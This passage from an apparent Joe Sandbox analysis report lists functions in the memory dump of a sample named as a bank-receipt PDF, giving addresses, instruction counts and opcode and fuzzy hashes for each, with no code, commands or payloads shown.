                                                                                                                • Instruction ID: 40ce09e223527ae6c33aad2e21dcf45f8a0661d2dbaa44df1ad4aa92a458ae26
                                                                                                                • Opcode Fuzzy Hash: d122a5b4267b25e9ef654c2a5a01be33fcf40de7c7abaefe8bcde32943fa31c5
                                                                                                                • Instruction Fuzzy Hash: 58F0F9B0D1430A9FDB54DFA9C546AAEBFF4BF09310F60446AE514E3201E7B59610DFA0
                                                                                                                Function 08275AC0 Relevance: .0, Instructions: 30COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2046202539.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8270000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: d1b84537b084536120601e17bfae03f7ebeb96911a0a93f360b0b2c5c5add1e2
                                                                                                                • Instruction ID: 6904503db4b034038db79fe2c78cd00f10a3c3cba7550a461696b89aaef21264
                                                                                                                • Opcode Fuzzy Hash: d1b84537b084536120601e17bfae03f7ebeb96911a0a93f360b0b2c5c5add1e2
                                                                                                                • Instruction Fuzzy Hash: B7F0F4B4D252099FCB44DFA9C5056AEFFF5FF48301F10856AD818A3381EBB14A04CB95
                                                                                                                Function 0827FBA8 Relevance: .0, Instructions: 30COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2046202539.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8270000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: e0c568c88ac5f40143a34eaa822ed54111bbd81f15ecc8cb0ecc5e627e6670d5
                                                                                                                • Instruction ID: dfa33856b7457da72600cbf9a972b6b16f8067f02f8d70aef5886231be8e6f5c
                                                                                                                • Opcode Fuzzy Hash: e0c568c88ac5f40143a34eaa822ed54111bbd81f15ecc8cb0ecc5e627e6670d5
                                                                                                                • Instruction Fuzzy Hash: 21F05E70D09248AFCB12DBA8D4446DDFFB0AB45211F1181AEC844A7251D6744A46DB42
                                                                                                                Function 082706F4 Relevance: .0, Instructions: 30COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2046202539.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8270000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 91d0bee22777d1bcaf0dc2dd01f0986f072d8345f6b8033646d9327764e07282
                                                                                                                • Instruction ID: ed97fe3855afe3b4d0e461097ed7f3256d72abc07eead0a086c79c54f23aa858
                                                                                                                • Opcode Fuzzy Hash: 91d0bee22777d1bcaf0dc2dd01f0986f072d8345f6b8033646d9327764e07282
                                                                                                                • Instruction Fuzzy Hash: 8D01B278A01658CFCB48CFA5C9849DDBBF2EB88311F2480A9D805A7308D635AE898E15
                                                                                                                Function 08271D90 Relevance: .0, Instructions: 29COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2046202539.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8270000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 7aac4c38e4a8cd852943fcd30d51290bb7f28f17a9aff06ac3056ade7b3d9b8d
                                                                                                                • Instruction ID: e16465bc6db01d11a461604438f6cf935d70097248dcc2018a2a60b83acccb37
                                                                                                                • Opcode Fuzzy Hash: 7aac4c38e4a8cd852943fcd30d51290bb7f28f17a9aff06ac3056ade7b3d9b8d
                                                                                                                • Instruction Fuzzy Hash: A2F0DAB0D1430A9FDB54DFA9C841AAEBFF4AF48301F5045AAD918E7300E77196508F91
                                                                                                                Function 08278E22 Relevance: .0, Instructions: 28COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2046202539.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8270000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 1c84c8852671d405d011d72856ff89823b2ab3e3f7dc39113a49d06b2824bd91
                                                                                                                • Instruction ID: af242d79050ae7666c77493bb7f60b28fefddc8f6bbc80d7fcc602e2eec8ad4f
                                                                                                                • Opcode Fuzzy Hash: 1c84c8852671d405d011d72856ff89823b2ab3e3f7dc39113a49d06b2824bd91
                                                                                                                • Instruction Fuzzy Hash: F3F05874D093499FCB02EFB8C8006AEBFB0EB09300F0086AED85493342D3758A51DB95
                                                                                                                Function 08279059 Relevance: .0, Instructions: 28COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2046202539.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8270000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 0138d54816931461fae7979c3a85b97f5fda14889602bd700ffb29d9c689cb78
                                                                                                                • Instruction ID: d8431808de0df5de43405c6a4960d790a9f016b06b74a840500748b92d4136ae
                                                                                                                • Opcode Fuzzy Hash: 0138d54816931461fae7979c3a85b97f5fda14889602bd700ffb29d9c689cb78
                                                                                                                • Instruction Fuzzy Hash: 48F0A030E66309CFCB54CB5AE8806ECBB7DFB89212F0095A8C00DA3225C77519D8CF01
                                                                                                                Function 0827A779 Relevance: .0, Instructions: 28COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2046202539.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8270000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: d01900da1c6d8a7ac8015d772935c039d173fa358494b92e5517e8eafb0a32c4
                                                                                                                • Instruction ID: c4773e799ba7241e0b16bf5043827e09a48d106a58dc9c0f78f1c5d9c3508432
                                                                                                                • Opcode Fuzzy Hash: d01900da1c6d8a7ac8015d772935c039d173fa358494b92e5517e8eafb0a32c4
                                                                                                                • Instruction Fuzzy Hash: 35F05F78E16268CFCB55CF64D980AADBBB5EF19305F50509AD84AA7301D271AE81CF41
                                                                                                                Function 0827A9DE Relevance: .0, Instructions: 27COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2046202539.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8270000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 69ba6a01d5b35de7afc86b9abb4b5b7ddac9428ba90f34393111d062219683aa
                                                                                                                • Instruction ID: 44c9f09914e3e3b0cbe040c0577bfeefca8e88959c6455ca80d07ed0b96b0f11
                                                                                                                • Opcode Fuzzy Hash: 69ba6a01d5b35de7afc86b9abb4b5b7ddac9428ba90f34393111d062219683aa
                                                                                                                • Instruction Fuzzy Hash: 8DF05E31529254CFD319CB25D5449ACB779FB0A213B5094D9E80B9B213C771D881CF14
                                                                                                                Function 08275F56 Relevance: .0, Instructions: 27COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2046202539.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8270000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 0427bde7a897ba981332e30c2daec19146e3d85a18d8428d7c13da9f1ae489f3
                                                                                                                • Instruction ID: 81800b711b54b1191b3e85fdb953412217e3d932b0c21496473c1dee30ab79c8
                                                                                                                • Opcode Fuzzy Hash: 0427bde7a897ba981332e30c2daec19146e3d85a18d8428d7c13da9f1ae489f3
                                                                                                                • Instruction Fuzzy Hash: ADE06D72600109AF9F48DF98DA45A9EBBFAEF48324B14816AE408E7324E731D9508B50
                                                                                                                Function 0827CFA2 Relevance: .0, Instructions: 26COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2046202539.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8270000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 0fb4bca886cde721324722efdd4c12f24c6cad7c1d72ad04ae2df6ea625ef993
                                                                                                                • Instruction ID: 1bbd54915280e3881aff0936dba76cd9684cde17ca5d12747306dfd40571d9bd
                                                                                                                • Opcode Fuzzy Hash: 0fb4bca886cde721324722efdd4c12f24c6cad7c1d72ad04ae2df6ea625ef993
                                                                                                                • Instruction Fuzzy Hash: BBF03A34E11209DFCB04DFA5E5489ACBBB5FF88312B10812ED01AEB345DB319891CF51
                                                                                                                Function 0827D14C Relevance: .0, Instructions: 26COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2046202539.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8270000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: c10670495ce7d2fed685b0486040b373a23e6362cacc8dde57a230aa685e6a33
                                                                                                                • Instruction ID: f64d28b107e742bcbd646fe570d8d35f2b8a960e08561709d67535c9712f6d2e
                                                                                                                • Opcode Fuzzy Hash: c10670495ce7d2fed685b0486040b373a23e6362cacc8dde57a230aa685e6a33
                                                                                                                • Instruction Fuzzy Hash: F8F090389102598FCB04EFE4E584A9CBBF9FF44315F208218D415AF3ACC7709885CB10
                                                                                                                Function 0827E850 Relevance: .0, Instructions: 23COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2046202539.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8270000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 855c88a262f14e053c0bf276fd6d03147d0816aef5b9fd8fb2019f6391512be4
                                                                                                                • Instruction ID: e37851b49d5aa5ba335a4a253cb49fa58ec5dc9992201d7672c873ba3bd32a41
                                                                                                                • Opcode Fuzzy Hash: 855c88a262f14e053c0bf276fd6d03147d0816aef5b9fd8fb2019f6391512be4
                                                                                                                • Instruction Fuzzy Hash: 64F01574D00208EFCB40EFA8E50868CBBB5EB88302F10C1AEE844A2350D6359AA0DF51
                                                                                                                Function 0827AB3E Relevance: .0, Instructions: 23COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2046202539.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8270000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 4a734e24dc3bdede55116bab9d18e576b3d3530cb4f0a0d3fff573567ef6dd68
                                                                                                                • Instruction ID: 06c34d2d40fa5ecfa91f0147b5d620ed1e32cc4d2dd5b238dc3bc38293759649
                                                                                                                • Opcode Fuzzy Hash: 4a734e24dc3bdede55116bab9d18e576b3d3530cb4f0a0d3fff573567ef6dd68
                                                                                                                • Instruction Fuzzy Hash: 3FF04D78A16228CFCB65CF58D980A9DB7B5BB09301F5050DAE84AA7311D371AE81CF01
                                                                                                                Function 08271D28 Relevance: .0, Instructions: 23COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2046202539.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8270000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: edfaafe2abbbf5e1a8bf7dd64659d8d41598ee4463b9c112204c0c6f9bdd5ba6
                                                                                                                • Instruction ID: d80f61da185a5b9af93a2d2b8904774f58ba6d77dba391e968884bfa6475f801
                                                                                                                • Opcode Fuzzy Hash: edfaafe2abbbf5e1a8bf7dd64659d8d41598ee4463b9c112204c0c6f9bdd5ba6
                                                                                                                • Instruction Fuzzy Hash: 22E0C2B0D1461AEFD740EFA9C50579ABBF1BF48705F208569E419E7211E7B096118F80
                                                                                                                Function 08271278 Relevance: .0, Instructions: 22COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2046202539.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8270000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 95e8f6c6d657b83fb943cecb07734c3c96f5401d53a1c9a2d3dd6444e174b449
                                                                                                                • Instruction ID: 9c6c834de76909b45502bb31b8ae7b23ffc32acaf47cc65927eff9354f53b84d
                                                                                                                • Opcode Fuzzy Hash: 95e8f6c6d657b83fb943cecb07734c3c96f5401d53a1c9a2d3dd6444e174b449
                                                                                                                • Instruction Fuzzy Hash: E1E06D3A900214DFC710CB64E48C884B330FF48376B1042E9E826873A6CB328E91DF50
                                                                                                                Function 08278E30 Relevance: .0, Instructions: 21COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2046202539.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8270000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: b6988c37c6ed626d568f5a602a40b8e8ef8c3fc215e569f4d25687a1d728f048
                                                                                                                • Instruction ID: 5c3b737677580377b23c049e70f7ba8617d09de0b5b49e08278d1a863dd5fe95
                                                                                                                • Opcode Fuzzy Hash: b6988c37c6ed626d568f5a602a40b8e8ef8c3fc215e569f4d25687a1d728f048
                                                                                                                • Instruction Fuzzy Hash: 7FE06D70D01309DFCB04DFA8C8006ADBBF0FB04300F4085AED814A3300D7759651DB84
                                                                                                                Function 0827B0B3 Relevance: .0, Instructions: 21COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2046202539.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8270000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: f5ef46980da95de4afce73601dd8daa884905d95ddbd0946ab5cdbc73e2b1bb0
                                                                                                                • Instruction ID: 83082e81c4aa6b491723e0cd2abd70849ced773dc80440b52ea5910bb573b5dc
                                                                                                                • Opcode Fuzzy Hash: f5ef46980da95de4afce73601dd8daa884905d95ddbd0946ab5cdbc73e2b1bb0
                                                                                                                • Instruction Fuzzy Hash: C4F0153141C290EBEB45CF25D48C626B774FF0A722B1485EAD88A6E80BC7324981DFA1
                                                                                                                Function 0827AF68 Relevance: .0, Instructions: 20COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2046202539.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8270000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 13b507349790a4570c267303c08a1b899c2972585148ffaec74cbffebd4604d0
                                                                                                                • Instruction ID: bc07e99f3afb5068aa113a1c32876380ea88742b611693a3ae6c297c8629aeae
                                                                                                                • Opcode Fuzzy Hash: 13b507349790a4570c267303c08a1b899c2972585148ffaec74cbffebd4604d0
                                                                                                                • Instruction Fuzzy Hash: F4F07478E16268CFCB65DF18C984A98BBB5FF09310F1052E9E859A7751C3319E81CF00
                                                                                                                Function 082772A3 Relevance: .0, Instructions: 20COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2046202539.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8270000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: a2d69ddd3c589b753c8af7b28d701ee76757400207e6d4880705aebeb4ae0a7b
                                                                                                                • Instruction ID: f7dc874aae92c69dc3b10cfd0fda5ea3ef00d947a3fa644e43226978652cc961
                                                                                                                • Opcode Fuzzy Hash: a2d69ddd3c589b753c8af7b28d701ee76757400207e6d4880705aebeb4ae0a7b
                                                                                                                • Instruction Fuzzy Hash: 08E04F749612459FCB55DFA8C4459D8BFB0EB05325F1082DAE828873A2C6399946DB40
                                                                                                                Function 0827D3B5 Relevance: .0, Instructions: 20COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2046202539.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8270000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: a7853aa5fbd5c9fc07a0e7e0fe8d45e5796135a050e20b6e9303423cdf7b3499
                                                                                                                • Instruction ID: 940ded23fae1a6fdf1a82b78bf03cca3695df8b1f396f801e76ddc0bf368f7ae
                                                                                                                • Opcode Fuzzy Hash: a7853aa5fbd5c9fc07a0e7e0fe8d45e5796135a050e20b6e9303423cdf7b3499
                                                                                                                • Instruction Fuzzy Hash: D0E026B28381088FEF08DEB6CD41E943B98AF2031AB00435290309A2EEF3B0A001CB40
                                                                                                                Function 08278E72 Relevance: .0, Instructions: 19COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2046202539.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8270000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 6f199ec8516a3d6b7ee3477d8857311aa6709ae4bad029bf8bdfcabe93d1b6ff
                                                                                                                • Instruction ID: 02f5302268758530d7c956231b854d46e04043ec6c028d9b25d0c8ce349494e6
                                                                                                                • Opcode Fuzzy Hash: 6f199ec8516a3d6b7ee3477d8857311aa6709ae4bad029bf8bdfcabe93d1b6ff
                                                                                                                • Instruction Fuzzy Hash: E2D05E310892859FC32327B8B80C5EAFF749B12212B1983AFE48585463C67501E4C766
                                                                                                                Function 08277068 Relevance: .0, Instructions: 19COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2046202539.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8270000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: dc920a14c3ea251dcb985066f585bb9f1fd140f7081e5bae05c6519e6f3ac771
                                                                                                                • Instruction ID: 142e416f2cf17f89be6ddde6e2e50afbf13dc9092e26df2c31f98f8e71aebbbd
                                                                                                                • Opcode Fuzzy Hash: dc920a14c3ea251dcb985066f585bb9f1fd140f7081e5bae05c6519e6f3ac771
                                                                                                                • Instruction Fuzzy Hash: D8E0DF30850246AFCB19CBB8C14538CFFB0EB01320F1046C9E82447281D7390552DB40
                                                                                                                Function 0827B0EF Relevance: .0, Instructions: 19COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2046202539.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8270000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 94a7ebf85c6a376e1f8aa99ab16cbd475e73d3d05be493555fb7d0aa66bb9ef0
                                                                                                                • Instruction ID: d83522c1aee3c73bb70aa3545b1b395952c295f0aada9ea5d6bc8af2c095301c
                                                                                                                • Opcode Fuzzy Hash: 94a7ebf85c6a376e1f8aa99ab16cbd475e73d3d05be493555fb7d0aa66bb9ef0
                                                                                                                • Instruction Fuzzy Hash: 8FE06530109280DFD701AB21E48C66ABBB4FF4630272485EAD88A6E163CB368C82CF41
                                                                                                                Function 082772A8 Relevance: .0, Instructions: 19COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2046202539.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8270000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 9dd7cc95b962ecb0e0cd25b2aadb8109cdec9818a5d2e3c4225b5ef4deba337b
                                                                                                                • Instruction ID: 38139c5c22df3ec4b1ba82a0bbe348b242bcede7b4bdc38fc18171290eee51f3
                                                                                                                • Opcode Fuzzy Hash: 9dd7cc95b962ecb0e0cd25b2aadb8109cdec9818a5d2e3c4225b5ef4deba337b
                                                                                                                • Instruction Fuzzy Hash: 89E09A74D212089FC784EFA9D445A9CBBF4EB08611F0081EAE818D7351E6759954CF41
                                                                                                                Function 08271D38 Relevance: .0, Instructions: 18COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2046202539.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8270000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 562ce5ff2134cec7b1b2a92598044c4663025c5ddfd7f64f3287aa1ebb758db8
                                                                                                                • Instruction ID: 35741351ef62c056128952ffcf0ad7d97be3b0b348b31c1b9a2850a38c341092
                                                                                                                • Opcode Fuzzy Hash: 562ce5ff2134cec7b1b2a92598044c4663025c5ddfd7f64f3287aa1ebb758db8
                                                                                                                • Instruction Fuzzy Hash: 8AE092B0D5060A9FD740EFAAC905A5EBBF0AF08601F1185A9D019E7211E7B496058F91
                                                                                                                Function 08271260 Relevance: .0, Instructions: 18COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2046202539.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8270000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: ca2b3a8b16a3f82c91ca90b4e2673eef3b4ee68d119117008bcb30b982a4bb11
                                                                                                                • Instruction ID: d3d8fe2f2b9aec6870c577fc927aecc45b74cf8839d5ac80b1fccad09250ef3d
                                                                                                                • Opcode Fuzzy Hash: ca2b3a8b16a3f82c91ca90b4e2673eef3b4ee68d119117008bcb30b982a4bb11
                                                                                                                • Instruction Fuzzy Hash: 77E0123A601214DFC315DF69E558498BB71FF85366B9040AEE50587325C732D9A0DF50
                                                                                                                Function 082798C8 Relevance: .0, Instructions: 17COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2046202539.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8270000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 1a92d6e75326ddd816a6e42939f3b4ba5ecbc4af6032603615d8acb2a09ebb91
                                                                                                                • Instruction ID: ea8b41f7a44a39083d106ea19afddf2690239cee0d1bcc0b65a434c93277d809
                                                                                                                • Opcode Fuzzy Hash: 1a92d6e75326ddd816a6e42939f3b4ba5ecbc4af6032603615d8acb2a09ebb91
                                                                                                                • Instruction Fuzzy Hash: 05E0B634A15204CFDB04DF64D484EADBB75EF49302F219058E9066B361C775AC82CB00
                                                                                                                Function 08277078 Relevance: .0, Instructions: 17COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2046202539.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8270000_rDEKONT-1_15_2025__75kb__pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 279a401fa18f6cb307c6a9e0b2674ba2590aea336f764de364f9425fe418cbca
                                                                                                                • Instruction ID: 0e4e5bc2b852784bd13dce6020309026758fb407ff63418a2f8bd788e6833d57
                                                                                                                • Opcode Fuzzy Hash: 279a401fa18f6cb307c6a9e0b2674ba2590aea336f764de364f9425fe418cbca
                                                                                                                • Instruction Fuzzy Hash: 07E0E274D11209AFCB54EFB9D44569CBFF4EB44201F0081AAA818A3240EA785A54CF81
                                                                                                                Function 08274980 Relevance: .0, Instructions: 15COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2046202539.0000000008270000.00000040.00000800.00020000.00000000.sdmp, Offset: 08270000, based on PE: false
